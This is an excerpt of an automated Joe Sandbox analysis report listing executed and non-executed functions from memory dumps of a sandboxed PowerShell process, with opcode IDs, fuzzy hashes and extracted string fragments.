                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: be0bd67c4762bf52f365bb284e1a848ecc05369b474a251892c2fd8f7b563c8f
                                                                                                                                                                                                                                • Instruction ID: 8eb104af771e4b701057ac9b7ced11949e63204b0c2286e346ba40cbed220392
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be0bd67c4762bf52f365bb284e1a848ecc05369b474a251892c2fd8f7b563c8f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91F0A031349AA06FC317972D9910C9FBFA5AEC652130400AEE15ACB292CA54D80687E6
                                                                                                                                                                                                                                Function 04E29610 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e54aa411752db84e91f81385e01767069b9f7ee8e716e1b85b1b7278dbe5cc12
                                                                                                                                                                                                                                • Instruction ID: 005659498f81f6fc4dba89c1a2d99091826420f26fbbbe15ce6a46de8e4690ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e54aa411752db84e91f81385e01767069b9f7ee8e716e1b85b1b7278dbe5cc12
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BE0D8327051B10FD75172BD19006BB6BC54FC1169708637EC549CB683DD45DC0343E1
                                                                                                                                                                                                                                Function 04E2E150 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f43d5c59fc606335cdc82513fadf788b6db0e8fb247e5c50fa93f8584360314e
                                                                                                                                                                                                                                • Instruction ID: 0200a2c67eee6c2ecd195d877b2b738a9828892662144eb0378f067beb6041e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f43d5c59fc606335cdc82513fadf788b6db0e8fb247e5c50fa93f8584360314e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE06D353001218FC3009B1DD444C26B7EAEFCE72535510A9E545DB330CA31EC018B90
                                                                                                                                                                                                                                Function 04E29228 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 200329503230e10c5702272d3b2977592128432f67f38ecf1e76517e9a445f1d
                                                                                                                                                                                                                                • Instruction ID: 765e506348cb17e34cc8d6509db2f8076502c1bceebab6cee9bb854546774011
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 200329503230e10c5702272d3b2977592128432f67f38ecf1e76517e9a445f1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EF05E706093144FD760DFB8D49879B7BE1EB40314F00456DD59ED7282CB3868868B91
                                                                                                                                                                                                                                Function 04E2DFE1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3dec9ec1c558272be1b19beb2df017afef55ec4f7ae30b5d4f922427e3848891
                                                                                                                                                                                                                                • Instruction ID: 078687352aea675de8347724e2c74c19ab65abdf93af1a1bfb33168fd51c5f77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9ec1c558272be1b19beb2df017afef55ec4f7ae30b5d4f922427e3848891
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E0ED35B000B09ACB09C66CE8548ECBB719FC9221F0484BEE90AEB691DA619806D6E0
                                                                                                                                                                                                                                Function 04E28A2A Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1f5f3eb7c2d4312aca984a33cf2d4786818ebf30215d8f069bc03a12c8953f05
                                                                                                                                                                                                                                • Instruction ID: 47dadbd361f12bab96d552128b30dbf11d814c4d6fda952a92f2936c0b44bb11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5f3eb7c2d4312aca984a33cf2d4786818ebf30215d8f069bc03a12c8953f05
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F0EC3570D3904BD7066774944C19E7F72EFC5218F04005ED546C7243CF681806C795
                                                                                                                                                                                                                                Function 04E29238 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 599ce9787c49cb1121b681ebfefe9580ff4594692806fe1b28443ce52fd852e1
                                                                                                                                                                                                                                • Instruction ID: dbf99d0e38f3fe547622be722e3e483f7b9717195880d7e789d107aeaf91d896
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599ce9787c49cb1121b681ebfefe9580ff4594692806fe1b28443ce52fd852e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38F06D70A043144BD360AFB8D49839ABBE5FB44314F00442DD55EC3240DB3968818B90
                                                                                                                                                                                                                                Function 04E28A38 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b34dc7734b771546a594e93e43cb567eeb7fcba999ce57aa038a9695d6227ec7
                                                                                                                                                                                                                                • Instruction ID: f76192483156cafb0a44165c2bd82502ba6be3f83c213188c4725ff442eb9942
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b34dc7734b771546a594e93e43cb567eeb7fcba999ce57aa038a9695d6227ec7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBE0863570872457DB0937B9A51C2AF7A56EBC4729F04002ED60A87381CF79691287E9
                                                                                                                                                                                                                                Function 04E29620 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 500fa657fc80a3b021fe2bb4034097181e4ecc327b5e57295b1a4370eeec050f
                                                                                                                                                                                                                                • Instruction ID: 79f482e7bd7838f3c2438eb4c7a39b49f709a63e65627418f2dd5b28beba680d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 500fa657fc80a3b021fe2bb4034097181e4ecc327b5e57295b1a4370eeec050f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBD05E3270023107A6A476EE2A0177BA1CE9BC44A9B0572369A08C3242ED40FC0243F5
                                                                                                                                                                                                                                Function 04E2B059 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0b6e598d4a861837a3bf192faceb049c6919023ecb1f0004bd9da6134149a8bb
                                                                                                                                                                                                                                • Instruction ID: fe814aff127dac7b861086b301cc746f47eff0e58f8562ae448d93998fd466fc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6e598d4a861837a3bf192faceb049c6919023ecb1f0004bd9da6134149a8bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72E0C22570C5F00AC71AC23E6420AAE2FE78FC652571880BEE18DCB602DC428907878A
                                                                                                                                                                                                                                Function 04E2DFF0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                • Instruction ID: 8a4ee28ff8604ab2f084a6bb0091c880bebff0784a1eec904ed47922384300a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE08631B0002497CB08969DD4144E9F7B5DBCC220F04847AD90AA7340EA72691686A1
                                                                                                                                                                                                                                Function 04E2DFA0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7fa1e6e3adc04ddb055c2c8eec7697b56709fa099fd588e32e9de5a56f02ed00
                                                                                                                                                                                                                                • Instruction ID: 68c71506be235fabce3c1f05099489b8f11829bd15eef6290fadde23aa8d987d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fa1e6e3adc04ddb055c2c8eec7697b56709fa099fd588e32e9de5a56f02ed00
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E0C2317406241BC2166A6EAA1089FBBDAEFC8675310442EE12AC7340DE64ED0547F9
                                                                                                                                                                                                                                Function 04E288C0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8baee08c3afa388f461620795ddeef337f425441e50e58f479de85201c248115
                                                                                                                                                                                                                                • Instruction ID: 4c8073ac6aa58175f86c6fa979dbf6c898038550a7ac2c677c43a89dad651d53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8baee08c3afa388f461620795ddeef337f425441e50e58f479de85201c248115
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE09B39A4C29A4FC706EBBCD84545E7FB0DF06210B0001ADD949DB393D6615402CBC1
                                                                                                                                                                                                                                Function 04E2F6E1 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9737a0592f3895599b11bd8d70a54ed583c8c6c457b648b639ca49b6b02374ca
                                                                                                                                                                                                                                • Instruction ID: 8e34dd4ad53c42566f95e6ff972be6f5f4b7af363d5957100ea54e2705dc4138
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9737a0592f3895599b11bd8d70a54ed583c8c6c457b648b639ca49b6b02374ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25E01A78D09249AFC780DFB9D9415A9FFF4AF49210F5081EA8909D7602E6719A029BD2
                                                                                                                                                                                                                                Function 04E287F9 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5800630cb7666efd93149384d4bb5efb0f22373bd62a6dd1f01f350444b15a1d
                                                                                                                                                                                                                                • Instruction ID: a073edbace718e7393333381db3515b119daccf54f790f54c9cae864494117ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5800630cb7666efd93149384d4bb5efb0f22373bd62a6dd1f01f350444b15a1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00E09235A0C2D68FCB0EFBA8D4494ADBF30EE01202B4400DCD55A57492DA201546CBC1
                                                                                                                                                                                                                                Function 04E2F6F0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                • Instruction ID: 93bb2f5455f810d3330ae0d8697698703d329d759067e2d72b9d67493dc692ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7D067B4D042199FC780EFADC9415AEFBF4EF48200F6085AA8919E7301F7329A129BD1
                                                                                                                                                                                                                                Function 04E288D0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4f08ac41e34ac1aa3eadbca6cee3098e82a0ea456f741c4b24570be314c3b107
                                                                                                                                                                                                                                • Instruction ID: 44c212a50f5c9dc2503d9c61b3826d3e287f0d8617cefdc9c9d7d070459a49ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f08ac41e34ac1aa3eadbca6cee3098e82a0ea456f741c4b24570be314c3b107
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06D01734A0820E8BCB08FFA8E84686EBBB5EB44200F00416ADE0A93340EA316801CBD1
                                                                                                                                                                                                                                Function 04E28808 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d78573dee52e99ed66637c4c4c240ed9012f70361a703ac9705c40ed54ea8755
                                                                                                                                                                                                                                • Instruction ID: cf657cc6519c5ca3b1455fd942c46f0230f2c962b8d9825032e5ee052911347a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d78573dee52e99ed66637c4c4c240ed9012f70361a703ac9705c40ed54ea8755
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAD067359082098BCB0CBBA4E85A4BDBB34FB14301F40416DD91752191EA312A5ACBC1
                                                                                                                                                                                                                                Function 04E279F0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cab302104deeede6ccf11dc517e59c0b727678f1bc66c4f3f0e451e1b55a42a3
                                                                                                                                                                                                                                • Instruction ID: 0d546d83fabc690dbfb0500531803ff17c2e110548f1fa9d85b53649ffea8e12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cab302104deeede6ccf11dc517e59c0b727678f1bc66c4f3f0e451e1b55a42a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2ED0227900A3804FCB079B34C080A043F256F40220B0201EED84E0BB93C936C44DCF00
                                                                                                                                                                                                                                Function 04E27F60 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 02d8a2a4b2e45bee22f24421dbeb667706d29a596f070465394199fc20b26ea2
                                                                                                                                                                                                                                • Instruction ID: 8a4d495f9e7126ca2a36395036fc6699b847734e002b652b10bcfe45ccc3e0e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02d8a2a4b2e45bee22f24421dbeb667706d29a596f070465394199fc20b26ea2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05B0228E80002283FF02823088CC3022FE20BC2A2AF0A828808020B080CC38C802C200
                                                                                                                                                                                                                                Function 04E27A00 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aeea3820cc4efe6d4450b4c0663da0ef0371e93695904402f984aaa37af2d147
                                                                                                                                                                                                                                • Instruction ID: a70a9a877d77b5a5663e32aa749192bb7043340b9e3d2cdcef856eec2332446c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeea3820cc4efe6d4450b4c0663da0ef0371e93695904402f984aaa37af2d147
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B092310447098FC2496F79E4088147329BB4021938009A9E90E0A7928E36E889CA45

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 07D41D10 Relevance: 20.4, Strings: 16, Instructions: 404COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $c7i$4'^q$4'^q$4'^q$4'^q$84Bj$84Bj$tP^q$tP^q$JEj$JEj$JEj$JEj$JEj$rDj$rDj
                                                                                                                                                                                                                                • API String ID: 0-1366519375
                                                                                                                                                                                                                                • Opcode ID: f3f4515b6a7a2dc02c6739a895f98db870218d2849e28a344e7c2e2142d23e07
                                                                                                                                                                                                                                • Instruction ID: a4a693ccd9c8455e6af5098493e096db35443381a693a77e3d192756663329e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3f4515b6a7a2dc02c6739a895f98db870218d2849e28a344e7c2e2142d23e07
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DED159B1B0430A8FCB258B68D804666FBF2BFC6310F1884BBD5558B355DB32D985C7A2
                                                                                                                                                                                                                                Function 07D43A58 Relevance: 12.8, Strings: 10, Instructions: 328COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$:j$:j
                                                                                                                                                                                                                                • API String ID: 0-4225290296
                                                                                                                                                                                                                                • Opcode ID: d95e5191175e7470e5baa91960d36c5cf2e2300fc4f0ef6ecf8e343ac4d87d09
                                                                                                                                                                                                                                • Instruction ID: 7dfa268fbe1075c222dbed5a5c09c3d8830d75d5dd4e5bb6403ccd0faec40bce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d95e5191175e7470e5baa91960d36c5cf2e2300fc4f0ef6ecf8e343ac4d87d09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2A144B27043559FDB259A6DD800766FFA6EFC2620F1880ABD445EF292CA32D845C3A1
                                                                                                                                                                                                                                Function 07D41080 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: fcq$84Bj$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-3915575003
                                                                                                                                                                                                                                • Opcode ID: c511282b79207e033c732ad4c25f0214c48b868cabce1a183524463e69f9db2c
                                                                                                                                                                                                                                • Instruction ID: d0b0b0a2d3483a0203e471475395ba2e9d6751e038bbc297e94acf3e3dfbc18d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c511282b79207e033c732ad4c25f0214c48b868cabce1a183524463e69f9db2c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87617BB0A0020EDFDB288F44C589BAAFBF1BB45345F548156E845AB2A0C736DCC5CBA1
                                                                                                                                                                                                                                Function 04E2EE38 Relevance: 10.2, Strings: 8, Instructions: 181COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-4154621813
                                                                                                                                                                                                                                • Opcode ID: c8371deea9873b724ba65b565c6312fe3094db59aa7cbd62ecc16270d50b7849
